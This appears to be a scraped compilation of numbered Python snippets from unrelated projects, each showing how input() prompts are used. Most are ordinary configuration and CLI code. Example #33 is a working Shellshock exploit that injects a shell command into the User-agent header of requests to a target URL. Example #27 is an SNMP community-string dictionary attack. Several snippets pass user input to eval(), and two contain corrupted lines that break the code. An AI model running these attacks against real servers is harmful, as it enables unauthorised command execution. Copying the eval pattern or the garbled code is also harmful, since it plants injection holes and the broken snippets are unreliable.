def build_browser():
    """Parse opts and run a BrowerBuilder."""
    parser = get_parser()
    (opts, args) = parser.parse_args()

    if opts.cluster is None:
        opts.cluster = input('Cluster IP or hostname: ')

    if opts.debug:
        log_lvl = logging.DEBUG
        logging.getLogger("urllib3").setLevel(logging.INFO)
    else:
        log_lvl = logging.INFO
        logging.getLogger("urllib3").setLevel(logging.WARNING)
    if opts.logfile:
        logging.basicConfig(level=log_lvl, datefmt='%Y-%m-%dT%H:%M:%S',
                            format='%(asctime)s [%(levelname)s] %(message)s',
                            filename=opts.logfile)
    else:
        logging.basicConfig(level=log_lvl, datefmt='%Y-%m-%dT%H:%M:%S',
                            format='%(asctime)s [%(levelname)s] %(message)s')

    if not opts.username:
        opts.username = input('Cluster username: ')
    if not opts.password:
        opts.password = getpass.getpass()
    store_ip = not opts.anon_ip
    bb = BrowserBuilder(opts.cluster, opts.username, opts.password, store_ip)
    bb.build_browser()
Example #2
File: user.py  Project: Raphux/passhport
def prompt_create():
    """Prompt user to obtain data for request"""
    name = input("Name: ")
    sshkey = input("SSH Key: ")
    comment = input("Comment: ")

    return {"<name>": name, "<sshkey>": sshkey, "--comment": comment}
Example #3
def Initialize(config=None, token=None):
  """Initialize or update a GRR configuration."""

  print("Checking write access on config %s" % config["Config.writeback"])
  if not os.access(config.parser.filename, os.W_OK):
    raise IOError("Config not writeable (need sudo?)")

  print("\nStep 0: Importing Configuration from previous installation.")
  options_imported = 0
  prev_config_file = config.Get("ConfigUpdater.old_config", default=None)
  if prev_config_file and os.access(prev_config_file, os.R_OK):
    print("Found config file %s." % prev_config_file)
    if input("Do you want to import this configuration?"
             " [yN]: ").upper() == "Y":
      options_imported = ImportConfig(prev_config_file, config)
  else:
    print("No old config file found.")

  print("\nStep 1: Key Generation")
  if config.Get("PrivateKeys.server_key", default=None):
    if options_imported > 0:
      print("Since you have imported keys from another installation in the "
            "last step,\nyou probably do not want to generate new keys now.")
    if (input("You already have keys in your config, do you want to"
              " overwrite them? [yN]: ").upper() or "N") == "Y":
      GenerateKeys(config, overwrite_keys=True)
  else:
    GenerateKeys(config)

  print("\nStep 2: Setting Basic Configuration Parameters")
  ConfigureBaseOptions(config)
  AddUsers(token=token)
  ManageBinaries(config, token=token)
  print("\nGRR Initialization complete!\n")
Example #4
def letter_menu(donors):
    donor_name = None  # for static inspections
    donation_amount = None

    while True:
        user_input = input("Input donor name (or 'back', 'list'): ").strip()
        if user_input.lower() == "back":
            return
        elif user_input.lower() == "list":
            print(make_donor_list(donors))
            continue
        elif not user_input:
            # empty string, ask again
            continue
        # user_input is now the donor's name
        donor_name = user_input
        break

    while True:
        user_input = input("Enter donation amount ('back'): ").strip()
        if user_input.lower() == "back":
            return  # back to main menu
        if not user_input:
            continue

        donation_amount = parse_donation_amount(user_input)
        if not donation_amount:
            print("'{}' is not a valid donation amount!".format(user_input))
            continue
        else:
            break

    donors.add_donation(donor_name, donation_amount)
    print(make_thank_you(donor_name, donation_amount))
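# parse_donation_amount is not shown in this example; a minimal sketch that is
# consistent with the call site above (a falsy return value means the text was
# not a valid amount) -- the '$' and ',' stripping is an assumption, not part
# of the original:
def parse_donation_amount(text):
    """Return the donation as a positive float, or None if it cannot be parsed."""
    try:
        amount = float(text.replace('$', '').replace(',', ''))
    except ValueError:
        return None
    return amount if amount > 0 else None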
Example #5
def prompt_rmuser():
    """Prompt user to obtain data to remove a user"""
    username = input("Username: "******"Usergroupname: ")

    return {"<username>": username,
            "<usergroupname>": usergroupname}
Example #6
def prompt_addusergroup():
    """Prompt user to obtain data to add a usergroup"""
    subusergroupname = input("Subusergroupname: ")
    usergroupname = input("Usergroupname: ")

    return {"<subusergroupname>": subusergroupname,
            "<usergroupname>": usergroupname}
Example #7
def reset_retriever(scope):
    """Remove stored information on scripts, data, and connections"""

    warning_messages = {
        'all': "\nThis will remove existing scripts, cached data, and information on database connections. \nSpecifically it will remove the scripts and raw_data folders and the connections.config file in {}. \nDo you want to proceed? (y/N)\n",
        'scripts': "\nThis will remove existing scripts. \nSpecifically it will remove the scripts folder in {}.\nDo you want to proceed? (y/N)\n",
        'data': "\nThis will remove raw data cached by the Retriever. \nSpecifically it will remove the raw_data folder in {}. \nDo you want to proceed? (y/N)\n",
        'connections': "\nThis will remove stored information on database connections. \nSpecifically it will remove the connections.config file in {}. \nDo you want to proceed? (y/N)\n"
    }

    path = os.path.normpath(HOME_DIR)
    warn_msg = warning_messages[scope].format(path)
    confirm = input(warn_msg)
    while not (confirm.lower() in ['y', 'n', '']):
        print("Please enter either y or n.")
        confirm = input()
    if confirm.lower() == 'y':
        if scope in ['data', 'all']:
            shutil.rmtree(os.path.join(path, 'raw_data'))
        if scope in ['scripts', 'all']:
            shutil.rmtree(os.path.join(path, 'scripts'))
        if scope in ['connections', 'all']:
            try:
                os.remove(os.path.join(path, 'connections.config'))
            except:
                pass
Example #8
    def tune(self, freq, power_lvl_dbm):
        """
        Ask the user to set the TX frequency. Once the user continues, the
        assumption is that we can start RXing.
        """
        input("Please tune the signal generator to {:.3f} MHz and {:.1f} dBm, "
              "then press Enter".format(freq / 1e6, power_lvl_dbm))
Example #9
    def setup(self, args, positional):
        ModTool.setup(self, args, positional)

        if ((self._skip_subdirs['lib'] and self._info['lang'] == 'cpp') or
                (self._skip_subdirs['python'] and self._info['lang'] == 'python')):
            raise ModToolException('Missing or skipping relevant subdir.')

        # first make sure the old block name is provided
        self._info['oldname'] = args.old_name
        if self._info['oldname'] is None:
            if len(positional) >= 2:
                self._info['oldname'] = positional[1]
            else:
                self._info['oldname'] = input("Enter name of block/code to rename (without module name prefix): ")
        if not re.match('[a-zA-Z0-9_]+', self._info['oldname']):
            raise ModToolException('Invalid block name.')
        print("Block/code to rename identifier: " + self._info['oldname'])
        self._info['fulloldname'] = self._info['modname'] + '_' + self._info['oldname']

        # now get the new block name
        self._info['newname'] = args.new_name
        if self._info['newname'] is None:
            if len(positional) >= 3:
                self._info['newname'] = positional[2]
            else:
                self._info['newname'] = input("Enter name of block/code (without module name prefix): ")
        if not re.match('[a-zA-Z0-9_]+', self._info['newname']):
            raise ModToolException('Invalid block name.')
        print("Block/code identifier: " + self._info['newname'])
        self._info['fullnewname'] = self._info['modname'] + '_' + self._info['newname']
Example #10
def create_esp_surfaces(Molecule):
    Rads = [VdW99[i] for i in Molecule.elem]
    #xyz = Molecule.xyzs[0]
    na = Molecule.na
    printxyz=True
    np.set_printoptions(precision=10, linewidth=120)
    # Pass 1: This will determine the number of ESP points.
    num_esp = []
    for i, xyz in enumerate(Molecule.xyzs):
        print("Generating grid points for snapshot %i\r" % i)
        num_esp_shell = []
        for j in [1.4, 1.6, 1.8, 2.0]:
            Radii = list(np.array(Rads)*j)
            vfloat = drive_msms(xyz, Radii, 20.0/j)
            if len(vfloat) < na:
                warn_press_key("I generated less ESP points than atoms!")
            num_esp_shell.append(len(vfloat))
        num_esp.append(num_esp_shell)

    num_esp = np.array(num_esp)
    num_pts = np.amin(num_esp, axis=0) // 100  # integer division so the result can be used as a slice bound below
    print("Number of points: ", num_pts)
    input()
    # We do not store.
    # Pass 2: This will actually print out the ESP grids.
    Mol_ESP = []
    for i, xyz in enumerate(Molecule.xyzs):
        esp_pts = []
        for sh, j in enumerate([1.4, 1.6, 1.8, 2.0]):
            Radii = list(np.array(Rads)*j)
            vfloat = drive_msms(xyz, Radii, 20.0/j)

            # print "Calling MSMS"
            # MS = MSMS(coords = list(xyz), radii = Radii)
            # print "Computing"
            # MS.compute(density=20.0/j)
            # print "Getting triangles"
            # vfloat, vint, tri = MS.getTriangles()
            # #vfloat = vfloat_shell[sh]
            a = list(range(len(vfloat)))
            random.shuffle(a)
            # We'll be careful and generate lots of ESP points, mm.
            # But we can't have a different number of points per snapshots, mm.
            for idx in a[:num_pts[sh]]:
                esp_pts.append(vfloat[idx][:3])
        if printxyz:
            Out = []
            Out.append("%i" % (len(xyz) + len(esp_pts)))
            Out.append("Molecule plus ESP points (heliums)")
            for j, x in enumerate(xyz):
                Out.append(format_xyz_coord(Molecule.elem[j], x))
            for esp_pt in esp_pts:
                Out.append(format_xyz_coord('He',esp_pt))
            fout = open('molecule_esp.xyz','w' if i == 0 else 'a')
            for line in Out:
                print(line, file=fout)
            fout.close()
        Mol_ESP.append(esp_pts)

    return Mol_ESP
Example #11
def prompt_adduser():
    """Prompt user to obtain data to add a user"""
    username = input("Username: "******"Targetgroupname: ")

    return {"<username>": username,
            "<targetgroupname>": targetgroupname}
Example #12
def prompt_addtarget():
    """Prompt user to obtain data to add a target"""
    targetname = input("Targetname: ")
    targetgroupname = input("Targetgroupname: ")

    return {"<targetname>": targetname,
            "<targetgroupname>": targetgroupname}
Example #13
def prompt_rmusergroup():
    """Prompt user to obtain data to remove a usergroup"""
    usergroupname = input("Usergroupname: ")
    targetgroupname = input("Targetgroupname: ")

    return {"<usergroupname>": usergroupname,
            "<targetgroupname>": targetgroupname}
Example #14
def prompt_rmtargetgroup():
    """Prompt user to obtain data to remove a targetgroup"""
    subtargetgroupname = input("Subtargetgroupname: ")
    targetgroupname = input("Targetgroupname: ")

    return {"<subtargetgroupname>": subtargetgroupname,
            "<targetgroupname>": targetgroupname}
Example #15
def main():
    """
    Welcome to the Thellier-Thellier experiment automatic chart maker.
    Please select the desired step interval and the upper bound for which it is valid,
    e.g.,
    50
    500
    10
    600

    which would generate steps with 50 degree intervals up to 500,
    followed by 10 degree intervals up to 600.
    A blank entry signals the end of data entry.

    The chart is stored in:  chart.txt
    """
    print(main.__doc__)
    if '-h' in sys.argv:
        sys.exit()
    cont, Int, Top = 1, [], []
    while cont == 1:
        try:
            Int.append(int(input(" Enter desired treatment step interval: <return> to quit ")))
            Top.append(int(input(" Enter upper bound for this interval: ")))
        except:
            cont = 0
    pmag.chart_maker(Int,Top)
Example #16
  def __call__(self, parser, namespace, values, option_string):
    # I know this import looks out of place but importing readline has side effects (namely,
    # enabling readline support for all input), so I import it here so at least the side effects
    # are restricted to this method call and not importing this module.
    import readline
    for arg in parser.interactive_args:
      required = arg.get('was_required', False)
      is_boolean = arg.get('action') in ('store_true', 'store_false')

      maybe_default = '(default={})'.format(arg['default']) if 'default' in arg else None
      maybe_optional = '[optional]' if (not required and not is_boolean) else None
      maybe_boolean = '[Y/n]' if is_boolean else None

      modifiers = [x for x in (maybe_default, maybe_optional, maybe_boolean) if x]
      prompt = colors.bold('{}{}{}? '.format(
        arg['help'],
        (' ' if len(modifiers) > 0 else ''),  # Space if modifiers nonempty
        ' '.join(modifiers)
      ))
      value = input(prompt)
      # Repeat while input is invalid.
      while (
        (value.strip() == '' and required) or
        (is_boolean and self._convert_to_boolean(value) is None)
      ):
        value = input(prompt)
      if is_boolean:
        value = self._convert_to_boolean(value)
      elif not required:
        value = value or None  # Convert the empty string to None.
      python_name = InteractiveArgumentParser._convert_to_python_name(arg['name'])
      setattr(namespace, python_name, value)
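# _convert_to_boolean is referenced above but not shown; in the original it is
# presumably a method on the parser class. A plausible sketch (the accepted
# spellings are an assumption; the '[Y/n]' prompt suggests an empty answer
# defaults to True, and returning None makes the loop above re-prompt):
def _convert_to_boolean(value):
    value = value.strip().lower()
    if value in ('', 'y', 'yes', 't', 'true'):
        return True
    if value in ('n', 'no', 'f', 'false'):
        return False
    return None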
Example #17
def getEssay(soup, topic):
    topic_content = soup.find('h2')
    user_input = ''
    essay_text = ''

    while user_input != 'stop':
        user_input = eval(input(topic_content))
        if user_input == 's':
            topic_content = topic_content.find_next('h2')
        elif user_input == 'n':
            topic_content = topic_content.find_next()
        elif user_input == 'y':
            if topic_content.name == 'h2':
                topic_content.name = 'h3'
            elif topic_content.name == 'h3':
                topic_content.name = 'h4'
            elif topic_content.name == 'h5':
                topic_content.name = 'h6'
            elif topic_content.name == 'h6':
                topic_content.name = 'b'
            essay_text = essay_text + str(topic_content)
            topic_content = topic_content.find_next()
        else: 
            user_input = eval(input('whoops, try again'))

    e = Exhibit(title=soup.h1.string, slug=slugify(soup.h1.string), essay=essay_text, scraped_from=topic)
    e.save()
    return e
Example #18
def get_dc_params(FIRST_GET_DC, specimen, treat_type, yn):
    if FIRST_GET_DC:
        yn = input("Is the DC field used in this IZZI study constant or does it vary between specimen or step? (y=const) [y/N]: ")
        FIRST_GET_DC = False
    if "y" == yn:
        DC_FIELD, DC_PHI, DC_THETA = list(map(float, eval(input("What DC field, Phi, and Theta was used for all steps? (float (in microTesla),float,float): "))))
        GET_DC_PARAMS = False
    else:
        GET_DC_PARAMS = True  # field varies, so keep prompting for each specimen/step
        DC_FIELD, DC_PHI, DC_THETA = list(map(float, eval(input("What DC field, Phi, and Theta was used for specimen %s and step %s? (float (in microTesla),float,float): " % (str(specimen), str(treat_type))))))
    return GET_DC_PARAMS, FIRST_GET_DC, yn, DC_FIELD*1e-6, DC_PHI, DC_THETA
Example #19
def boolean_input_prompt(message):
    # Both branches of the original Python 2/3 check called input(), so the
    # version test is redundant.
    result = input(message)
    result = result.upper()
    return result in ("Y", "YES", "T", "TRUE")
Example #20
def get_dc_params(FIRST_GET_DC, specimen, treat_type, yn):
    """
    Prompts the user for DC field data if not provided. This is just an encapsulation function for the above program and should not be used elsewhere.

    Parameters
    -----------
    FIRST_GET_DC : is this the first time you are asking for DC data?
    specimen : what specimen do you want DC data for?
    treat_type : what kind of step was it? PTM, Tail, in field, zero field?
    yn : is the DC field constant or varying? (y = constant, n = varying)

    Returns
    -----------
    GET_DC_PARAMS : whether or not to rerun this function
    FIRST_GET_DC : same as above
    yn : same as above
    DC_FIELD : field strength in Tesla
    DC_PHI : field azimuth
    DC_THETA : field polar angle
    """
    if FIRST_GET_DC:
        yn = input("Is the DC field used in this IZZI study constant or does it vary between specimen or step? (y=const) [y/N]: ")
        FIRST_GET_DC = False
    if "y" == yn:
        DC_FIELD, DC_PHI, DC_THETA = list(map(float, eval(input("What DC field, Phi, and Theta was used for all steps? (float (in microTesla),float,float): "))))
        GET_DC_PARAMS = False
    else:
        GET_DC_PARAMS = True  # field varies, so keep prompting for each specimen/step
        DC_FIELD, DC_PHI, DC_THETA = list(map(float, eval(input("What DC field, Phi, and Theta was used for specimen %s and step %s? (float (in microTesla),float,float): " % (str(specimen), str(treat_type))))))
    return GET_DC_PARAMS, FIRST_GET_DC, yn, DC_FIELD*1e-6, DC_PHI, DC_THETA
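# The eval(input(...)) calls above are an artifact of automatic Python 2-to-3
# conversion (Python 2's input() evaluated whatever the user typed). A sketch
# of the same prompt parsed without eval, assuming the user answers with three
# comma-separated numbers such as "40,0,-90":
def prompt_dc_params(prompt):
    reply = input(prompt)
    dc_field, dc_phi, dc_theta = (float(x) for x in reply.split(','))
    return dc_field * 1e-6, dc_phi, dc_theta  # microTesla -> Tesla, as in the original return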
Example #21
    def check_valve(self, tank):

        self.lld.valve_switch(tank, False)
        assert(input("Is valve "+ tank.tank_name +" OFF ? [y/n]") == "y")

        self.lld.valve_switch(tank, True)
        assert(input("Is valve "+tank.tank_name+" ON ? [y/n]") == "y")
Example #22
def readSExtractor(filename):
    with pyfits.open(filename) as pf:
        for hdu in pf:
            if hdu.name == "PRIMARY":
                pass
            elif hdu.name == "LDAC_IMHEAD":
                hdr = hdu.data[0][0]    # the fits header from the original fits image
                print(hdr[3])
            elif hdu.name == "LDAC_OBJECTS":
                print("%d objects" % (len(hdu.data)))
                # Find the VIGNET column
                ttype = [k for k, v in hdu.header.items() if v == "VIGNET"]
                if not ttype:
                    raise RuntimeError("Unable to find a VIGNET column")
                vignetCol = int(re.search(r"^TTYPE(\d+)$", ttype[0]).group(1)) - 1

                for row in range(len(hdu.data)):
                    pixelData = hdu.data[row][vignetCol]
                    bad = np.where(pixelData < -1e29)
                    sat = np.where(pixelData > 99e3)
                    pixelData[bad] = 0.0
                    mi = afwImage.MaskedImageF(*hdu.data[row][vignetCol].shape)
                    im = mi.getImage()
                    im.getArray()[:] = pixelData
                    msk = mi.getMask().getArray()
                    msk[bad] = afwImage.MaskU.getPlaneBitMask("BAD")
                    msk[sat] = afwImage.MaskU.getPlaneBitMask("SAT")
                    ds9.mtv(mi, title=row)
                    input("Next ")
Example #23
def configure(consumer_key, sort_field, words_per_minute):
    pocket_app.init_consumer_key(consumer_key)

    request_token = pocket_app.get_request_token()

    if not request_token:
        print('Could not obtain request_token')
        return

    url = 'http://getpocket.com/auth/authorize?request_token={0}' \
          '&redirect_uri={1}'.format(request_token, 'http://www.google.com')

    print('You will have to authorize the application to access your articles')
    print('Enter any key once you\'re redirected to google.com')
    webbrowser.open_new_tab(url)
    input()

    access_token = pocket_app.get_access_token(request_token)

    if not access_token:
        print('Could not obtain access token')
        return

    pocket_app.configure(consumer_key, access_token,
                         words_per_minute, sort_field)
    print('The application is ready to use')
Example #24
File: ui.py  Project: leyyin/university
    def __buy(self):
        """
        Handle buy command
        Input:
        Output:
        
        """

        # get the name and quantity from the user
        print("Buy Product")
        name = input("Product name: ").strip()
        qty = input("Product quantity: ").strip()
        try:
            qty = int(qty)
        except ValueError:
            print("Quantity is not a number please try again")
            return

        # find the product instance by name
        products = self.__pController.filterByName(name)
        # if empty do nothing
        if not products:
            print("There are no products with that name")
            return

        # if found use the first product with that name
        self.__pController.addProductToCart(products[0], qty)
        print("Product added")
Example #25
def main(loadfile=None, savefile=None):
    Xtrain, Ytrain, Xtest, Ytest = getKaggleMNIST()
    if loadfile:
        dbn = DBN.load(loadfile)
    else:
        dbn = DBN([1000, 750, 500, 10]) # AutoEncoder is default
        # dbn = DBN([1000, 750, 500, 10], UnsupervisedModel=RBM)
        dbn.fit(Xtrain, pretrain_epochs=2)

    if savefile:
        dbn.save(savefile)

    # first layer features
    # initial weight is D x M
    W = dbn.hidden_layers[0].W.eval()
    for i in range(dbn.hidden_layers[0].M):
        imgplot = plt.imshow(W[:,i].reshape(28, 28), cmap='gray')
        plt.show()
        should_quit = input("Show more? Enter 'n' to quit\n")
        if should_quit == 'n':
            break

    # features learned in the last layer
    for k in range(dbn.hidden_layers[-1].M):
        # activate the kth node
        X = dbn.fit_to_input(k)
        imgplot = plt.imshow(X.reshape(28, 28), cmap='gray')
        plt.show()
        if k < dbn.hidden_layers[-1].M - 1:
            should_quit = input("Show more? Enter 'n' to quit\n")
            if should_quit == 'n':
                break
Example #26
def main():
    if "-h" in sys.argv:
        help(__name__)
        sys.exit()
    if "-i" in sys.argv: # interactive
        dir_path = "."
        dataset, datasets, filenames = [], [], []
        data_model = 3
        while True:
            infile=input('\n\n Enter magic files for combining, <return>  when done: ')
            if infile=='':
                break
            if os.path.isfile(infile):
                filenames.append(os.path.realpath(infile))
            else:
                print("-W- You have not provided a valid filename.\nIf the file is not in your current working directory, you will need to provide the full path to the file")
        outfile = input('\n\n Enter name for new combined file: ')
        filenames = str(", ".join(filenames))
        if not outfile:
            return False
    else: # non-interactive
        dataframe = extractor.command_line_dataframe([["F", True, ''], ["dm", False, 3]])
        args = extractor.extract_and_check_args(sys.argv, dataframe)
        data_model, dir_path, outfile, filenames = extractor.get_vars(["dm","WD", "F", "f"], args)
    combine(filenames,outfile,dir_path,data_model)
Example #27
def dictionary_attack(dict, ip_target, interface):
    f=open(dict, "r")
    content = f.read()
    communities = content.split("\n")
    communities_number = len(communities)
    i = 0
    cont = "y"
    found = False
    six.print_("[*] SNMP Dictionary attack STARTED")
    while cont == "y" and i < communities_number:
        response = get(ip_target, "1.3.6.1.2.1.1.1.0", interface, communities[i], 0.15)
        if response != None:
            if response.haslayer(SNMPresponse):
                if response[SNMPresponse].error == 0:
                    found = True
                    six.print_(colored("[*] Read-Only community string found!! - '" + communities[i] + "'", "green"))
                    cont = "x"
                    while cont != "y" and cont != "n":
                        cont = input("Do you want to continue? (y/n): ")

        response = set(ip_target, "1.3.6.1.2.1.1.6.0", "Location", communities[i], interface, 0.15)
        if response != None:
            if response.haslayer(SNMPresponse):
                if response[SNMPresponse].error == 0:
                    found = True
                    six.print_(colored("[*] Read-Write community string found!! - '" + communities[i] + "'", "green"))
                    cont = "x"
                    while cont != "y" and cont != "n":
                        cont = input("Do you want to continue? (y/n): ")

        i += 1
    six.print_("[*] SNMP Dictionary attack finished. " + str(i) + " community strings tried.")
    if i == communities_number and not found:
        six.print_("[*] No community strings matches found")
Example #28
    def _implicitBuildMatrix_(self, SparseMatrix, L, id1, id2, b, weight, var, boundaryConditions, interiorFaces, dt):
        mesh = var.mesh
        coeffMatrix = self._getCoeffMatrix_(var, weight)

        id1 = self._reshapeIDs(var, id1)
        id2 = self._reshapeIDs(var, id2)

        L.addAt(numerix.take(coeffMatrix['cell 1 diag'], interiorFaces, axis=-1).ravel(), id1.ravel(), id1.swapaxes(0, 1).ravel())
        L.addAt(numerix.take(coeffMatrix['cell 1 offdiag'], interiorFaces, axis=-1).ravel(), id1.ravel(), id2.swapaxes(0, 1).ravel())
        L.addAt(numerix.take(coeffMatrix['cell 2 offdiag'], interiorFaces, axis=-1).ravel(), id2.ravel(), id1.swapaxes(0, 1).ravel())
        L.addAt(numerix.take(coeffMatrix['cell 2 diag'], interiorFaces, axis=-1).ravel(), id2.ravel(), id2.swapaxes(0, 1).ravel())

        N = mesh.numberOfCells
        M = mesh._maxFacesPerCell

        for boundaryCondition in boundaryConditions:
            LL, bb = boundaryCondition._buildMatrix(SparseMatrix, N, M, coeffMatrix)

            if 'FIPY_DISPLAY_MATRIX' in os.environ:
                self._viewer.title = r"%s %s" % (boundaryCondition.__class__.__name__, self.__class__.__name__)
                self._viewer.plot(matrix=LL, RHSvector=bb)
                from fipy import raw_input
                input()

            L += LL
            b += bb
Example #29
def _handle_command(command, config, command_options, log):
    if command == Config.Command.update.name:
        config.update()

    elif command == Config.Command.list.name:
        config.list()

    elif command == Config.Command.details.name:
        sub_index = _choose_sub(config)
        config.details(sub_index)
        input("Press enter when done.")

    elif command == Config.Command.download_queue.name:
        sub_index = _choose_sub(config)
        config.download_queue(sub_index)

    # TODO this needs work.
    elif command == Config.Command.enqueue.name:
        (sub_index, entry_nums) = _sub_list_command_wrapper(config, command, log)
        config.enqueue(sub_index, entry_nums)

    elif command == Config.Command.mark.name:
        (sub_index, entry_nums) = _sub_list_command_wrapper(config, command, log)
        config.mark(sub_index, entry_nums)

    elif command == Config.Command.unmark.name:
        (sub_index, entry_nums) = _sub_list_command_wrapper(config, command, log)
        config.unmark(sub_index, entry_nums)

    else:
        log.error("Unknown command. Allowed commands are:")
        for command in command_options:
            log.error("    {}: {}".format(command["return"], command["prompt"]))
        return
Example #30
def get_files(ctx, nginx_dir, yes):
    """
    Find nginx configuration files, and ask user to add a challenge section
    """
    step1_a = "First, you need to modify some/all of these nginx config files:\n\n"
    step1_b = "\n\nAdd the next part to a file's `server` section:\n%s" % NGINX_CHALLENGE
    step1_c = "\n-- WARNING! you have yet to modify the following files:\n"
    step1_d = "You should now restart/reload your nginx server.\n"
    enter_prompt = "Press Enter when done..."

    all_file_list, formatted_list = get_nginx_files(nginx_dir)

    first = None
    while True:
        if not first:
            click.echo(''.join([step1_a, formatted_list, step1_b]))
            input(enter_prompt)
            first = True
            continue
        unmodified_files, formatted_list = get_nginx_files(nginx_dir, skip_modified=True)
        click.echo(''.join([step1_c, formatted_list]))
        wat = yes or input("Do you want to skip these files? [Y/quit]").lower()[:1]
        if wat in ['y', '', True]:
            break
        elif wat == 'q':
            ctx.exit('Please run me again to start over')
        else:
            continue

    click.echo(step1_d)
    input(enter_prompt)

    return list(set(all_file_list) - set(unmodified_files))
Example #31
                        augment=False,
                        margin=5,
                        batch_size=2,
                        seq_len=20,
                        num_of_persons=len(dataset.get_persons()))
saver = tf.train.Saver()
tf.global_variables_initializer().run()

load = False
model_ckpt = './weights/' + model_name + '.ckpt.meta'

if os.path.isfile(model_ckpt):
    input_var = None
    while input_var not in ['yes', 'no']:
        input_var = input(
            "We found model files. Do you want to load it and continue training [yes/no]?"
        )
    if input_var == 'yes':
        load = True

if load:
    saver.restore(sess, './weights/' + model_name + '.ckpt')

batch_size = 2

batch_x1, batch_x2, batch_y, x2_labels, x1_labels = dataset.get_batch(
    training=siamese.training,
    optical_flow=siamese.optical_flow,
    batch_size=siamese.batch_size,
    seq_len=siamese.seq_len,
    augment=siamese.augment)
Example #32
if (port == None): port = 8080

#
# The host data structure will be a 3-element array of:
#
#     [<hostname>, <api-handle>, <map-cache-contents>]
#
hosts = []
if (len(sys.argv) > 1):
    args = sys.argv[1::]
    for host in args:
        hosts.append([host, None, None])
else:
    if (require_input):
        while (True):
            host = input("Enter hostname (enter return when done): ")
            if (host == ""): break
            hosts.append([host, None, None])
        #endwhile
    else:
        hosts.append(["localhost", None, None])
    #endif
#endif

print("Connecting to APIs ...", end=" ")
sys.stdout.flush()

#
# Open API with each hostname. Store in 2-element of array.
#
for host in hosts:
Example #33
# ~$ /bin/ls /
# bin
# boot
# dev
# etc
# ..
# ~$ /bin/cat /etc/passwd

from __future__ import print_function
from future import standard_library
standard_library.install_aliases()
from builtins import input
import sys, urllib.request, urllib.error, urllib.parse

if len(sys.argv) != 2:
        print("Usage: shell_shocker <URL>")
        sys.exit(0)

URL=sys.argv[1]
print("[+] Attempting Shell_Shock - Make sure to type full path")

while True:
        command=input("~$ ")
        opener=urllib.request.build_opener()
        opener.addheaders=[('User-agent', '() { foo;}; echo Content-Type: text/plain ; echo ; '+command)]
        try:
                response=opener.open(URL)
                for line in response.readlines():
                        print(line.strip())
        except Exception as e: print(e)
Example #34
         "'release %s'" % versionStr],
        cwd=VERSIONS)

    print("'versions' tags are now:",
          subprocess.check_output(["git", "tag"], cwd=VERSIONS).split())
    ok = subprocess.call(["git", "push", "%s" % versionStr], cwd=VERSIONS)
    if ok == 0:  # subprocess.call returns 0 on success
        print("Successfully pushed tag %s upstream" % versionStr)
    else:
        print("Failed to push tag %s upstream" % versionStr)

    # revert the __init__ file to non-distribution state
    print('reverting the main master branch: git reset --hard HEAD')
    print(subprocess.check_output(["git", "reset", "--hard", "HEAD"],
                                  cwd=MAIN))
    return True  # success


if __name__ == "__main__":
    if "--noCommit" in sys.argv:
        noCommit = True
    else:
        noCommit = False
    if "--noInteractive" not in sys.argv:
        interactive = True
    else:
        interactive = False
    # todo: update versions first
    versionStr = input("version:")
    buildRelease(versionStr, noCommit=noCommit, interactive=interactive)
Example #35
from shutil import copyfile
import sys  #for exiting if there's a problem
import os  #to check if files exist
import re  #for stripping file endings, etc.
import pandas as pd
import json  #for grant reporting
import input_specimens as inspec

#for safety, save an original version of the configuration file with all the notes.
copyfile('user_configuration.py', 'user_configuration_original.py')
File = open('user_configuration.py', 'w')

#%% Get going.
#path to folder where all your inputs are stored
INPUT_PATH = eval(
    input('\nType the path to the folder where all your inputs are stored.'))
File.write(f'INPUT_PATH = "{INPUT_PATH}"')

UPLOAD_FOLDER = eval(
    input('Type the name of the folder containing files to batch upload.'))
File.write(f'\nUPLOAD_FOLDER = "{UPLOAD_FOLDER}"')

CtMetaFolder = eval(
    input("\nDo you have a folder of CT metadata files? [y/n]"))
if CtMetaFolder == 'y':
    CT_METADATA_FOLDER = eval(
        input('Type the name of the folder of CT metadata files.'))
    File.write(f'\nCT_METADATA_FOLDER = "{CT_METADATA_FOLDER}"')
if CtMetaFolder == 'n':
    CT_METADATA_FOLDER = None
    File.write(f'\nCT_METADATA_FOLDER = None')
Example #36
    def __init__(self, config=None):
        # Default config dictionary
        self._configuration = {'user': '******',
                               'resource_paths': ['~/pyiron/resources'],
                               'project_paths': ['~/pyiron/projects'],
                               'sql_connection_string': None,
                               'sql_table_name': 'jobs_pyiron',
                               'sql_view_connection_string': None,
                               'sql_view_table_name': None,
                               'sql_view_user': None,
                               'sql_view_user_key': None,
                               'sql_file': None,
                               'sql_host': None,
                               'sql_type': 'SQLite',
                               'sql_user_key': None,
                               'sql_database': None}
        environment_keys = os.environ.keys()
        if 'PYIRONCONFIG' in environment_keys:
            config_file = os.environ['PYIRONCONFIG']
        else:
            config_file = os.path.expanduser(os.path.join("~", ".pyiron"))
        if os.path.isfile(config_file):
            self._config_parse_file(config_file)
        elif not any([env in environment_keys
                      for env in ['TRAVIS', 'APPVEYOR', 'CIRCLECI', 'CONDA_BUILD', 'GITLAB_CI']]):
            user_input = None
            while user_input not in ['yes', 'no']:
                user_input = input('It appears that pyiron is not yet configured, do you want to create a default start configuration (recommended: yes). [yes/no]:')
            if user_input.lower() == 'yes' or user_input.lower() == 'y':
                install_pyiron(config_file_name=config_file,
                               zip_file="resources.zip",
                               resource_directory="~/pyiron/resources",
                               giturl_for_zip_file="https://github.com/pyiron/pyiron-resources/archive/master.zip",
                               git_folder_name="pyiron-resources-master")
            else:
                raise ValueError('pyiron was not installed!')
            self._config_parse_file(config_file)

        # Take dictionary as primary source - overwrite everything
        if isinstance(config, dict):
            for key, value in config.items():
                if key not in ['resource_paths', 'project_paths'] or isinstance(value, list):
                    self._configuration[key] = value
                elif isinstance(value, str):
                    self._configuration[key] = [value]
                else:
                    raise TypeError('Config dictionary parameter type not recognized ', key, value)

        self._configuration['project_paths'] = [convert_path(path) + '/' if path[-1] != '/' else convert_path(path)
                                                for path in self._configuration['project_paths']]
        self._configuration['resource_paths'] = [convert_path(path)
                                                for path in self._configuration['resource_paths']]   

        # Build the SQLalchemy connection strings
        if self._configuration['sql_type'] == 'Postgres':
            self._configuration['sql_connection_string'] = 'postgresql://' + self._configuration['user'] + ':' \
                                                           + self._configuration['sql_user_key'] + '@' \
                                                           + self._configuration['sql_host'] \
                                                           + '/' + self._configuration['sql_database']
            if self._configuration['sql_view_user'] is not None:
                self._configuration['sql_view_connection_string'] = 'postgresql://' + \
                                                                    self._configuration['sql_view_user'] + ':' + \
                                                                    self._configuration['sql_view_user_key'] + '@' + \
                                                                    self._configuration['sql_host'] + '/' + \
                                                                    self._configuration['sql_database']
